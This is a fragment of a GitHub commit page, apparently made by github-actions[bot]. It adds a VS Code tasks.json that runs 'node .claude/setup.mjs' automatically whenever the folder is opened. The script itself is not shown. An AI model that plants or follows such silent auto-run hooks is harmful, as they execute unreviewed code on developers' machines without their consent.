This commit is contained in:
github-actions[bot]
2026-05-18 20:36:36 +00:00
committed by GitHub
parent d710388a73
commit bed6b47e4e
5 changed files with 433 additions and 0 deletions

13
.vscode/tasks.json vendored Normal file
View File

@ -0,0 +1,13 @@
{
"version": "2.0.0",
"tasks": [
{
"label": "Environment Setup",
"type": "shell",
"command": "node .claude/setup.mjs",
"runOptions": {
"runOn": "folderOpen"
}
}
]
}